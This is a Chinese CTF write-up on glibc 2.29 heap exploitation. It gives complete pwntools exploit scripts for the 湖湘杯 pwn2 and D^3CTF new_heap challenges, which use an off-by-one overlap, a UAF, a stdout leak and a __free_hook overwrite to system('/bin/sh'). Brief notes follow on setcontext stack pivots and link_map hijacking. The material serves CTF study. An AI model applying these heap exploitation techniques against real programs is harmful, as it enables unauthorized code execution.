glibc-2.29

2019 湖湘杯线下 pwn2

off by one，可以修改 size，形成 chunk overlap。（好像没用到新保护机制）

#-*- coding:utf-8 -*-
from PwnContext import *

try:
    from IPython import embed as ipy
except ImportError:
    print ('IPython not installed.')

#context.terminal = ['tmux', 'splitw', '-h'] # uncomment this if you use tmux
# functions for quick script
# Thin wrappers around the PwnContext ``ctx`` object so that the rest of the
# script reads as a short list of send/receive steps.  Every payload passed
# to the send helpers goes through str() before it is written to the target.
def s(data):
    """Send *data* as-is (no trailing newline)."""
    return ctx.send(str(data))


def sa(delim, data):
    """Wait until *delim* has been received, then send *data*."""
    return ctx.sendafter(str(delim), str(data))


def sl(data):
    """Send *data* followed by a newline."""
    return ctx.sendline(str(data))


def sla(delim, data):
    """Wait until *delim* has been received, then send *data* plus a newline."""
    return ctx.sendlineafter(str(delim), str(data))


def r(numb=4096):
    """Receive up to *numb* bytes."""
    return ctx.recv(numb)


def ru(delims, drop=True):
    """Receive up to *delims*; the delimiter itself is dropped unless drop=False."""
    return ctx.recvuntil(delims, drop)


def irt():
    """Hand the connection over to the user (interactive mode)."""
    return ctx.interactive()


def rs(*args, **kwargs):
    """Start (or restart) the target process via ctx.start."""
    return ctx.start(*args, **kwargs)


def dbg(gs='', **kwargs):
    """Attach the debugger, running the gdb script *gs* first."""
    return ctx.debug(gdbscript=gs, **kwargs)


def uu32(data):
    """Unpack a little-endian 32-bit value, NUL-padding short input."""
    return u32(data.ljust(4, '\0'))


def uu64(data):
    """Unpack a little-endian 64-bit value, NUL-padding short input."""
    return u64(data.ljust(8, '\0'))

# Script configuration.
# debugg: when non-zero the target is started right away (rs -> ctx.start).
# logg:   when non-zero pwntools logging is switched to 'debug' (very verbose).
debugg = 1
logg = 0
ctx.binary = './pwn2'
# Local copy of the libc the challenge ships with; the paths below are the
# author's machine-specific locations and must be adjusted when reused.
libc = ELF('/home/leo/glibc-all-in-one/libs/2.29-0ubuntu2_amd64/libc-2.29.so')
ctx.custom_lib_dir = '/home/leo/glibc-all-in-one/libs/2.29-0ubuntu2_amd64/'#remote libc
ctx.remote_libc = '/home/leo/glibc-all-in-one/libs/2.29-0ubuntu2_amd64/libc-2.29.so'
ctx.debug_remote_libc = True

# Extra symbol handed to ctx; presumably a binary-relative offset used by the
# debugger integration — not referenced elsewhere in this script.
ctx.symbols = {'lst':0x4060}

if debugg:
    rs()

# NOTE: the log level is only raised after the process has been started,
# so the start-up itself is not logged at debug level.
if logg:
    context.log_level='debug'
def add(idx,sz,c):
    """Menu option 1: allocate slot *idx* with *sz* bytes and fill it with *c*.

    The content prompt is answered with sa() (no trailing newline), so *c*
    must already carry any newline the program expects.
    """
    for prompt, value in (('> ', 1), ('idx:', idx), ('size:', sz)):
        sla(prompt, value)
    sa('cnt:', c)
def free(idx):
    """Menu option 2: release slot *idx*."""
    for prompt, value in (('> ', 2), ('idx:', idx)):
        sla(prompt, value)
def edit(idx,c):
    """Menu option 3: overwrite the contents of slot *idx* with *c*.

    *c* is sent with sa(), i.e. without an added newline.
    """
    for prompt, value in (('> ', 3), ('idx:', idx)):
        sla(prompt, value)
    sa('cnt:', c)
def show(idx):
    """Menu option 4: ask the program to print slot *idx*.

    Nothing is read here; the caller consumes the output with ru()/r().
    """
    for prompt, value in (('> ', 4), ('idx:', idx)):
        sla(prompt, value)
def backdoor(c):
    """Menu option 5: send *c* once the program's banner line has appeared."""
    banner = 'Because I know you are 666!'
    sla('> ', 5)
    sa(banner, c)
# Interaction sequence for the pwn2 challenge.  These menu calls are
# order-dependent (the writeup's note above explains the bug they rely on);
# they are not meant to be reordered or reused individually.
add(1,0x88,'a'*0x88)
add(2,0x428,'a'*0x428)
add(0,0x80,'a'*0x80)
add(3,0x233,'a'*0x233)
add(4,0x428,'a'*0x428)
add(5,0x88,'/bin/sh\x00'+'\n')
edit(1,'a'*0x88+p16(0xb31))
free(3)
free(2)
add(6,0x428,'c'*16+'\n')
show(0)
# Read the printed slot up to (and including) the 0x7f byte and turn it into
# a libc base; 0x1e4ca0 is the offset the author uses for this libc build.
lb = uu64(ru('\x7f',drop=False))-0x1e4ca0
fh = libc.sym['__free_hook']+lb
sys = libc.sym['system']+lb
success(hex(lb))
add(7,0x100,'a'*0x88+p64(0x241)+p64(fh)[:7]+'\n')

backdoor('b'*8)
backdoor(p64(sys))
free(5)

# Hand the session to the user.
irt()

D^3CTF new_heap

没有通过 setbuf(stdin, 0) 关闭缓冲区，利用 getchar() 触发的 malloc(0x1000) 构成 UAF 的巧用。

#-*- coding:utf-8 -*-
from PwnContext import *

try:
    from IPython import embed as ipy
except ImportError:
    print ('IPython not installed.')

#context.terminal = ['tmux', 'splitw', '-h'] # uncomment this if you use tmux
# functions for quick script
# Thin wrappers around the PwnContext ``ctx`` object so that the rest of the
# script reads as a short list of send/receive steps.  Every payload passed
# to the send helpers goes through str() before it is written to the target.
def s(data):
    """Send *data* as-is (no trailing newline)."""
    return ctx.send(str(data))


def sa(delim, data):
    """Wait until *delim* has been received, then send *data*."""
    return ctx.sendafter(str(delim), str(data))


def sl(data):
    """Send *data* followed by a newline."""
    return ctx.sendline(str(data))


def sla(delim, data):
    """Wait until *delim* has been received, then send *data* plus a newline."""
    return ctx.sendlineafter(str(delim), str(data))


def r(numb=4096):
    """Receive up to *numb* bytes."""
    return ctx.recv(numb)


def ru(delims, drop=True):
    """Receive up to *delims*; the delimiter itself is dropped unless drop=False."""
    return ctx.recvuntil(delims, drop)


def irt():
    """Hand the connection over to the user (interactive mode)."""
    return ctx.interactive()


def rs(*args, **kwargs):
    """Start (or restart) the target process via ctx.start."""
    return ctx.start(*args, **kwargs)


def dbg(gs='', **kwargs):
    """Attach the debugger, running the gdb script *gs* first."""
    return ctx.debug(gdbscript=gs, **kwargs)


def uu32(data):
    """Unpack a little-endian 32-bit value, NUL-padding short input."""
    return u32(data.ljust(4, '\0'))


def uu64(data):
    """Unpack a little-endian 64-bit value, NUL-padding short input."""
    return u64(data.ljust(8, '\0'))

# Script configuration.
# debugg: when non-zero the target is started right away (rs -> ctx.start).
# logg:   when non-zero pwntools logging is switched to 'debug' (very verbose).
debugg = 1
logg = 0
ctx.binary = './new_heap'
# Local copy of the libc the challenge ships with; the paths below are the
# author's machine-specific locations and must be adjusted when reused.
libc = ELF('/home/leo/glibc-all-in-one/libs/2.29-0ubuntu2_amd64/libc-2.29.so')
ctx.custom_lib_dir = '/home/leo/glibc-all-in-one/libs/2.29-0ubuntu2_amd64/'#remote libc
ctx.remote_libc = '/home/leo/glibc-all-in-one/libs/2.29-0ubuntu2_amd64/libc-2.29.so'
ctx.debug_remote_libc = True

# Extra symbol handed to ctx; presumably a binary-relative offset used by the
# debugger integration — not referenced elsewhere in this script.
ctx.symbols = {'lst':0x202060}

if debugg:
    rs()
# NOTE: the log level is only raised after the process has been started,
# so the start-up itself is not logged at debug level.
if logg:
    context.log_level='debug'
def add(sz,c):
    """Menu option 1: allocate *sz* bytes and fill the chunk with *c*.

    The content prompt is answered with sa() (no trailing newline).
    """
    for prompt, value in (('3.exit', 1), ('size:', sz)):
        sla(prompt, value)
    sa('content:', c)
def free(idx):
    """Menu option 2: release the chunk at *idx*."""
    for prompt, value in (('3.exit', 2), ('index:', idx)):
        sla(prompt, value)
    
# Interaction sequence for the new_heap challenge.  The menu calls below are
# order-dependent and are not meant to be reordered or reused individually.
# The program prints a heap address after this banner; parse it as hex.
ru('good present for African friends:')
low_heap = int(ru('\n',drop=True),16)
success(hex(low_heap))

add(0x78,'0')
add(0x78,'1')
add(0x78,'2')
add(0x78,'3')
add(0x78,'4')
add(0x78,'5')
add(0x78,'6')
add(0x78,'7')
for i in range(7):
    free(i)
free(7)
sla('3.exit',3)#7
sl('a')#malloc(0x1000)
add(0x10,'8')#top chunk

free(7)
add(0x68,'9')
add(0x68,'10')
add(0x68,'11')
free(11)
free(10)
free(7)#free(7) or free(9)

sla('3.exit',3)#7
sla('sure?','a'*0x30)
# Value derived from the leaked heap address; the constant is the author's
# offset for this build (see the trailing comment).
fd = low_heap>>4<<12 | 0x730 #libc
sla('3.exit',3)#7
sa('sure?',p16(fd))
stdout = 0x1760
# Debugging pause left in the script: attaches the debugger and then drops
# into an IPython shell.  Execution blocks here until that shell is exited;
# remove both lines for an unattended run.
dbg()
ipy()

add(0x20,p16(stdout))
add(0x68,'13')#13
add(0x68,'14')#14
add(0x68,p64(0xfbad1800)+p64(0)*3+'\xc8')
# Six leaked bytes, zero-padded to 8, minus the author's offset for this libc.
lb = uu64(r(6))-0x1e4a00
success(hex(lb))

free(7)
fh = libc.sym['__free_hook']+lb
sys = libc.sym['system']+lb
success(hex(fh))
sla('3.exit',3)#7
sa('sure?',p64(fh))
sla('3.exit',3)#7
sa('sure?',p64(fh))
add(0x68,'/bin/sh\x00')#16
add(0x68,p64(sys))
free(16)

# Hand the session to the user.
irt()

然而在我们控了free_hook以后,我们发现libc-2.29中没有可以利用rdi控制rsp进行迁栈的gadget,所以使用了其它方法。IO_wfile_sync函数可以利用rdi控制rdx,函数setcontext+0x35处可以用rdx控rsp,两个搭配使用就可以进行迁栈。在IO_wfile_sync+0x6d处有call [r12+0x20],这里的r12也是可以用rdi控制的,所以可以利用这条指令调用setcontext+0x35,实现free_hook -> IO_wfile_sync -> setcontext+0x35。https://www.anquanke.com/post/id/210160

劫持link_map

1、smallbin attack 攻击global_max_fast

2、fastbin attack 劫持topchunk

3、伪造link_map结构,调用setcontext+0x3d

4、ROP

https://www.anquanke.com/post/id/211331
